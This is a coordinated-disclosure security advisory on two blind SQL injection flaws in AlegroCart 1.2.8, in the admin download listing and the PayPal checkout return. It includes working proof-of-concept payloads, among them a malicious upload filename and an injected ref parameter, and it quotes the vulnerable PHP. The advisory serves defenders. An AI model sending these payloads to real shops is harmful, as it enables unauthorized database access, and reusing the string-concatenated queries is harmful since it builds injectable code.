Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    AlegroCart 1.2.8
Fixed in:            Patch AC128_fix_17102015
Path Link:           http://forum.alegrocart.com/download/file.php?id=1040
Vendor Website:      http://alegrocart.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

There is a blind SQL injection in the admin area of AlegroCart. Additionally,
there is a blind SQL injection when a customer purchases a product. Because of
a required interaction with PayPal, this injection is hard to exploit for an
attacker.

3. BLind SQL Injection (Admin)

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When viewing the list of uploaded files - or images - , the function
check_download is called. This function performs a database query with the
unsanitized name of the file. Because of this, an attacker can upload a file
containing SQL code in its name, which will be executed once files are listed.

Note that a similar function - check_filename - is called when deleting a file,
making it likely that this operation is vulnerable as well.

Admin credentials are required to exploit this issue.

Proof of Concept


POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16690383031191084421650661794
Content-Length: 865

-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="language[1][name]"

test
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="download"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(100000000,ENCODE('MSG','by 5 seconds')),null) -- -"
Content-Type: image/jpeg

img

-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="mask"

11953405959037.jpg
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="remaining"

1
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4"

f396df6c76265de943be163e9b65878a
-----------------------------16690383031191084421650661794--


Visiting
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download
will trigger the injected code.

Code


/upload/admin2/model/products/model_admin_download.php
function check_download($filename){
        $result = $this->database->getRow("select * from download where filename = '".$filename."'");
        return $result;
}

function check_filename($filename){
        $results = $this->database->getRows("select filename from download where filename = '" . $filename . "'");
        return $results;
}

/upload/admin2/controller/download.php
function checkFiles() {
        $files=glob(DIR_DOWNLOAD.'*.*');
        if (!$files) { return; }
        foreach ($files as $file) {
                $pattern='/\.('.implode('|',$this->prohibited_types).')$/';
                $filename=basename($file);
                if (!preg_match($pattern,$file) && $this->validate->strlen($filename,1,128)) {
                        $result = $this->modelDownload->check_download($filename);
                        if (!$result) { $this->init($filename); }
                }
        }
}

4. BLind SQL Injection (Customer)

CVSS

Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

There is an SQL Injection when using Paypal as a payment method during
checkout.

Please note that this injection requires that a successful interaction with
Paypal took place. For test purposes, we commented out the parts of the code
that actually perform this interaction with Paypal.

Proof of Concept


1. Register a User
2. Buy an item, using PayPal as payment method; stop at step "Checkout Confirmation"
3. Visit this link to trigger the injection: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION. Note that this requires a valid paypal tx token.

The injection can be exploited blind:


http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23)

However, this is rather unpractical, especially considering the need for a
valid PayPal token for each request.

It is also possible with this injection to inject into an UPDATE statement in
update_order_status_paidunconfirmed. The problem here is that it is difficult
to create an injection that exploits the UPDATE statement, but also results in
an order_id being returned by the previous SELECT statement.

It may also be possible to use the order_id that can be controlled via the
SELECT statement to inject into the INSERT statement in update_order_history.
But again, it is difficult to craft a query that does this, but also returns a
valid result for the UPDATE query.

Code


/upload/catalog/extension/payment/paypal.php:
function orderUpdate($status = 'final_order_status', $override = 0) {
    //Find the paid_unconfirmed status id
    $results = $this->getOrderStatusId('order_status_paid_unconfirmed');
    $paidUnconfirmedStatusId = $results?$results:0;
    //Find the final order status id
    $results = $this->getOrderStatusId($status);
    $finalStatusId = $results?$results:0;
    $reference = $this->request->get('ref');
    //Get Order Id
        $res = $this->modelPayment->get_order_id($reference);
    $order_id = $res['order_id'];
    //Update order only if state in paid unconfirmed OR override is set
    if ($order_id) {
if ($override) {
    // Update order status
    $result = $this->modelPayment->update_order_status_override($finalStatusId,$reference);
    // Update order_history
    if ($result) {
                                $this->modelPayment->update_order_history($order_id, $finalStatusId, 'override');
    }
} else {
    // Update order status only if status is currently paid_unconfirmed
                        $result = $this->modelPayment->update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId);
    // Update order_history
    if ($result)  {
                                $this->modelPayment->update_order_history($order_id, $finalStatusId, 'PDT/IPN');
    }
}
    }
}

/upload/catalog/model/payment/model_payment.php:
function get_order_id($reference){
        $result = $this->database->getrow("select `order_id` from `order` where `reference` = '" . $reference . "'");
        return $result;
}

function update_order_history($order_id, $finalStatusId,$comment){
        $this->database->query("insert into `order_history` set `order_id` = '" . $order_id . "', `order_status_id` = '" . $finalStatusId . "', `date_added` = now(), `notify` = '0', `comment` = '" . $comment . "'");
}

function update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId){
        $result = $this->database->countAffected($this->database->query("update `order` set `order_status_id` = '" . $finalStatusId . "' where `reference` = '" . $reference . "' and order_status_id = '" . $paidUnconfirmedStatusId . "'"));
        return $result;
}

5. Solution

To mitigate this issue please apply this patch:

http://forum.alegrocart.com/download/file.php?id=1040

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
17/10/2015 Vendor releases fix
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-SQL-Injection-104.html